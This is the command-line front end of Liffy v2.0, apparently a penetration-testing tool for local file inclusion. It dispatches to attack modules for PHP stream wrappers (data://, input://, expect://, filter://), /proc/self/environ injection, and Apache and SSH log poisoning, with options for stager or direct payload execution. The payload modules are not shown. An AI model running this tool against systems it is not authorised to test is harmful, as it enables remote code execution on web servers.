#!/usr/bin/python
import argparse
import os
import signal
import sys
import urllib.parse
from pyfiglet import figlet_format
from core import Expect, Filter, Input, accesslog, data, proc, sshlog
from core.utils import colors
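def ping(hostname):
    """Ping the host to check if it's up or down

    The probe is a single ICMP echo (``ping -c 1 -W2``) run as an argument
    list, so the hostname is never parsed by a shell.

    Arguments:
        hostname {str} -- hostname to ping

    Returns:
        bool -- Tell if host is up or not; False as well when the hostname is
                rejected or the ping binary cannot be started
    """
    # Function-scope import keeps this block independent of the file's import list.
    import subprocess

    # The caller derives the hostname from a user-supplied URL, so treat it as
    # untrusted. A leading "-" would be read by ping as an option, and anything
    # outside the usual host/address character set is not a host we can probe.
    if not hostname or hostname.startswith("-"):
        return False
    if not all(ch.isalnum() or ch in ".-_:[]" for ch in hostname):
        return False

    try:
        # An argv list (no shell) means metacharacters in the hostname cannot
        # start a second command, unlike a concatenated os.system() string.
        result = subprocess.run(
            ["ping", "-c", "1", "-W2", hostname],
            stdout=subprocess.DEVNULL,
            stderr=subprocess.DEVNULL,
            check=False,
        )
    except OSError:
        # ping is missing or not executable: report the host as not reachable.
        return False
    return result.returncode == 0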
def signal_handler(signal, frame):
    """Handle SIGINT: tell the user the run was interrupted, then exit.

    Arguments:
        signal {int} -- number of the delivered signal (unused; the name
                        shadows the ``signal`` module inside this function)
        frame {frame} -- interrupted stack frame (unused)
    """
    interrupted_msg = colors('\n\nYou pressed Ctrl+C!', 91)
    print(interrupted_msg)
    # Status 0: an interrupt by the operator is reported as a normal exit.
    sys.exit(0)
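def main():
    """Parse the command line and run the single selected LFI test technique.

    The positional ``url`` is split with ``urllib.parse.urlsplit``; a missing
    query string is reported but does not stop the run. Technique flags are
    checked in a fixed order (data, input, expect, proc, access, ssh, filter)
    and only the first one that is set is executed, so passing several flags
    runs one technique, not all of them.

    Exits with status 2 when no arguments are given and with status 0 when no
    technique flag is selected.
    """
    parser = argparse.ArgumentParser()
    parser.add_argument("url", help="URL to test for LFI")
    parser.add_argument("-d", "--data", help="Use data:// technique", action="store_true")
    parser.add_argument("-i", "--input", help="Use input:// technique", action="store_true")
    parser.add_argument("-e", "--expect", help="Use expect:// technique", action="store_true")
    parser.add_argument("-f", "--filter", help="Use filter:// technique", action="store_true")
    parser.add_argument("-p", "--proc", help="Use /proc/self/environ technique", action="store_true")
    parser.add_argument("-a", "--access", help="Apache access logs technique", action="store_true")
    parser.add_argument("-ns", "--nostager", help="execute payload directly, do not use stager", action="store_true")
    parser.add_argument("-r", "--relative", help="use path traversal sequences for attack", action="store_true")
    parser.add_argument("--ssh", help="SSH auth log poisoning", action="store_true")
    parser.add_argument("-l", "--location", help="path to target file (access log, auth log, etc.)")
    # NOTE(review): session cookies passed on the command line are visible in
    # the process list and shell history of the host running the test.
    parser.add_argument("--cookies", help="session cookies for authentication")

    # sys.argv always holds the script name, so the former `not len(sys.argv)`
    # test could never fire. Compare against 2 and print the usage line; status
    # 2 matches what argparse already returned for a missing URL.
    if len(sys.argv) < 2:
        print("[!] Not Enough Arguments!")
        parser.print_usage()
        sys.exit(2)

    args = parser.parse_args()

    url = args.url
    nostager = args.nostager
    relative = args.relative
    cookies = args.cookies

    parsed = urllib.parse.urlsplit(url)

    print(colors("[~] Checking Target: {0}".format(parsed.netloc), 93))

    # Reachability check is disabled. If it is re-enabled, note that
    # parsed.netloc can carry a port or userinfo; parsed.hostname is the bare
    # host.
    # if ping(parsed.netloc):
    #     print(colors("[+] Target looks alive ", 92))
    # else:
    #     print(colors("[!] Target irresponsive ", 91))
    #     sys.exit(1)

    # NOTE(review): this only warns; the selected technique still runs against
    # a URL without a GET parameter -- confirm whether it should exit here.
    if not parsed.query:
        print(colors("[!] No GET parameter Provided ", 91))

    # TODO: Find a better way to do these checks
    if args.data:
        print(colors("[~] Testing with data:// ", 93))
        data.Data(url, nostager, cookies).execute_data()
    elif args.input:
        print(colors("[~] Testing with input:// ", 93))
        Input.Input(url, nostager, cookies).execute_input()
    elif args.expect:
        print(colors("[~] Testing with expect:// ", 93))
        Expect.Expect(url, nostager, cookies).execute_expect()
    elif args.proc:
        print(colors("[~] /proc/self/environ Technique Selected!", 93))
        proc.Environ(url, nostager, relative, cookies).execute_environ()
    elif args.access:
        print(colors("[~] Testing for Apache access.log poisoning", 93))
        if args.location:
            log_path = args.location
        else:
            print(colors("[~] Log Location Not Provided! Using Default", 93))
            log_path = '/var/log/apache2/access.log'
        # NOTE(review): `accesslog` is imported from `core` the same way as the
        # modules used above (data.Data, sshlog.SSHLogs) but is called directly
        # here; if it is a module this raises TypeError -- confirm the class
        # name exported by the core package.
        access_test = accesslog(url, log_path, nostager, relative, cookies)
        access_test.execute_logs()
    elif args.ssh:
        print(colors("[~] Testing for SSH log poisoning ", 93))
        if args.location:
            log_path = args.location
        else:
            print(colors("[~] Log Location Not Provided! Using Default", 93))
            log_path = '/var/log/auth.log'
        sshlog.SSHLogs(url, log_path, relative, cookies).execute_ssh()
    elif args.filter:
        # The banner used to say expect:// (copy-paste from the branch above),
        # which mislabelled the technique in the operator's output.
        print(colors("[~] Testing with filter://", 93))
        Filter.Filter(url, cookies).execute_filter()
    else:
        print(colors("[!] Please select atleast one technique to test", 91))
        sys.exit(0)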
if __name__ == "__main__":
    # Register the Ctrl+C handler first so an interrupt at any later point
    # goes through signal_handler.
    signal.signal(signal.SIGINT, signal_handler)

    # Startup banner, then a blank gap before the run's own output.
    banner = figlet_format('Liffy v2.0', font='big')
    print(colors(banner, 92))
    print("\n")

    main()